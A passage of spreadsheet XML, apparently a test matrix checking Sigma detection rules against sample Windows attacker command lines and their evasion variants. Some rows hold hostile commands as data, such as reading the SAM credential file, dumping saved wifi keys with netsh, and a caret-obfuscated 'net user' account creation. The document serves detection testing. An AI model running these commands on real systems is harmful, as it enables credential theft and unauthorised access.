        <v>1</v>
      </c>
      <c r="I1718" s="43" t="n"/>
      <c r="J1718" s="43" t="n"/>
      <c r="K1718" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1719" ht="15.75" customHeight="1" s="42">
      <c r="A1719" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1719" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1719" s="43" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1719" s="43" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1719" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [E]"</t>
        </is>
      </c>
      <c r="F1719" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1719" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1719" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1719" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J1719" s="43" t="n"/>
      <c r="K1719" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1720" ht="15.75" customHeight="1" s="42">
      <c r="A1720" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1720" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1720" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1720" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1720" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F1720" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1720" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1720" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1720" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J1720" s="43" t="n"/>
      <c r="K1720" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1721" ht="15.75" customHeight="1" s="42">
      <c r="A1721" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1721" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1721" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1721" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1721" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F1721" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1721" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1721" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1721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721" s="43" t="n"/>
      <c r="K1721" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1722" ht="15.75" customHeight="1" s="42">
      <c r="A1722" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1722" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1722" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1722" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1722" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F1722" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1722" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1722" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1722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1722" s="43" t="n"/>
      <c r="K1722" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1723" ht="15.75" customHeight="1" s="42">
      <c r="A1723" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1723" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1723" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1723" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1723" s="43" t="inlineStr">
        <is>
          <t>wmic useraccount list brief</t>
        </is>
      </c>
      <c r="F1723" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1723" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1723" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1723" s="43" t="n"/>
      <c r="J1723" s="43" t="n"/>
      <c r="K1723" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1724" ht="15.75" customHeight="1" s="42">
      <c r="A1724" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1724" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1724" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1724" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1724" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" -"c" "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F1724" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1724" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1724" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1724" s="43" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f)</t>
        </is>
      </c>
      <c r="J1724" s="43" t="n"/>
      <c r="K1724" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1725" ht="15.75" customHeight="1" s="42">
      <c r="A1725" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1725" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1725" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1725" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1725" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /"c" "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F1725" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1725" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1725" s="43" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data (e7be6119-fc37-43f0-ad4f-1f3f99be2f9f)</t>
        </is>
      </c>
      <c r="J1725" s="43" t="n"/>
      <c r="K1725" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1726" ht="15.75" customHeight="1" s="42">
      <c r="A1726" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B1726" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C1726" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1726" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E1726" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo wlan show profile name=SSID key=clear | netsh.exe"</t>
        </is>
      </c>
      <c r="F1726" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1726" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1726" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1726" s="43" t="n"/>
      <c r="J1726" s="43" t="n"/>
      <c r="K1726" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1727" ht="15.75" customHeight="1" s="42">
      <c r="A1727" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1727" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1727" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1727" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1727" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1727" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1727" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1727" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1727" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1727" s="43" t="n"/>
      <c r="K1727" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1728" ht="15.75" customHeight="1" s="42">
      <c r="A1728" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1728" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C1728" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1728" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E1728" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /Namespace:\root\CIMV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F1728" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1728" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1728" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1728" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J1728" s="43" t="n"/>
      <c r="K1728" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1729" ht="15.75" customHeight="1" s="42">
      <c r="A1729" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1729" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C1729" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1729" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E1729" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nAmEspACe:\rooT\CImv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F1729" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1729" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1729" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1729" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J1729" s="43" t="n"/>
      <c r="K1729" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1730" ht="15.75" customHeight="1" s="42">
      <c r="A1730" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1730" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C1730" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1730" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E1730" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nAmesPace:\RooT\CImV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F1730" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1730" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1730" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1730" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J1730" s="43" t="n"/>
      <c r="K1730" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1731" ht="15.75" customHeight="1" s="42">
      <c r="A1731" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1731" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C1731" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1731" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E1731" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nAmESPACE:\root\cimv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F1731" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1731" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1731" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1731" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J1731" s="43" t="n"/>
      <c r="K1731" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1732" ht="15.75" customHeight="1" s="42">
      <c r="A1732" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1732" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C1732" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1732" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E1732" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F1732" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1732" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1732" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1732" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J1732" s="43" t="n"/>
      <c r="K1732" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1733" ht="15.75" customHeight="1" s="42">
      <c r="A1733" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1733" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C1733" s="43" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1733" s="43" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E1733" s="43" t="inlineStr">
        <is>
          <t>wmic.exe -"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F1733" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1733" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1733" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1733" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J1733" s="43" t="n"/>
      <c r="K1733" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1734" ht="15.75" customHeight="1" s="42">
      <c r="A1734" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1734" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C1734" s="43" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1734" s="43" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E1734" s="43" t="inlineStr">
        <is>
          <t>wmic.exe fsdir where "drive='C:'" get name,filesize</t>
        </is>
      </c>
      <c r="F1734" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1734" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1734" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1734" s="43" t="n"/>
      <c r="J1734" s="43" t="n"/>
      <c r="K1734" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1735" ht="15.75" customHeight="1" s="42">
      <c r="A1735" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1735" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C1735" s="43" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1735" s="43" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E1735" s="43" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk list brief</t>
        </is>
      </c>
      <c r="F1735" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1735" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1735" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1735" s="43" t="n"/>
      <c r="J1735" s="43" t="n"/>
      <c r="K1735" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1736" ht="15.75" customHeight="1" s="42">
      <c r="A1736" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1736" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C1736" s="43" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1736" s="43" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E1736" s="43" t="inlineStr">
        <is>
          <t>wmic.exe partition get name,size</t>
        </is>
      </c>
      <c r="F1736" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1736" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1736" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1736" s="43" t="n"/>
      <c r="J1736" s="43" t="n"/>
      <c r="K1736" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1737" ht="15.75" customHeight="1" s="42">
      <c r="A1737" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1737" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C1737" s="43" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D1737" s="43" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E1737" s="43" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk where "DriveType=3" get Name,Size,FreeSpace</t>
        </is>
      </c>
      <c r="F1737" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1737" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1737" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1737" s="43" t="n"/>
      <c r="J1737" s="43" t="n"/>
      <c r="K1737" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1738" ht="15.75" customHeight="1" s="42">
      <c r="A1738" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1738" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1738" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1738" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1738" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1738" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1738" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1738" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1738" s="43" t="n"/>
      <c r="J1738" s="43" t="n"/>
      <c r="K1738" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1739" ht="15.75" customHeight="1" s="42">
      <c r="A1739" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1739" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1739" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1739" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1739" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1739" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1739" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1739" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1739" s="43" t="n"/>
      <c r="J1739" s="43" t="n"/>
      <c r="K1739" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1740" ht="15.75" customHeight="1" s="42">
      <c r="A1740" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1740" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1740" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1740" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1740" s="43" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1740" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1740" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1740" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1740" s="43" t="n"/>
      <c r="J1740" s="43" t="n"/>
      <c r="K1740" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1741" ht="15.75" customHeight="1" s="42">
      <c r="A1741" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1741" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1741" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1741" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1741" s="43" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1741" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1741" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1741" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1741" s="43" t="n"/>
      <c r="J1741" s="43" t="n"/>
      <c r="K1741" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1742" ht="15.75" customHeight="1" s="42">
      <c r="A1742" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1742" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1742" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1742" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1742" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1742" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1742" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1742" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1742" s="43" t="n"/>
      <c r="J1742" s="43" t="n"/>
      <c r="K1742" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1743" ht="15.75" customHeight="1" s="42">
      <c r="A1743" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1743" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1743" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1743" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1743" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1743" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1743" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1743" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1743" s="43" t="n"/>
      <c r="J1743" s="43" t="n"/>
      <c r="K1743" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1744" ht="15.75" customHeight="1" s="42">
      <c r="A1744" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1744" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1744" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1744" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1744" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1744" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1744" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1744" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1744" s="43" t="n"/>
      <c r="J1744" s="43" t="n"/>
      <c r="K1744" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1745" ht="15.75" customHeight="1" s="42">
      <c r="A1745" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B1745" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1745" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1745" s="43" t="inlineStr">
        <is>
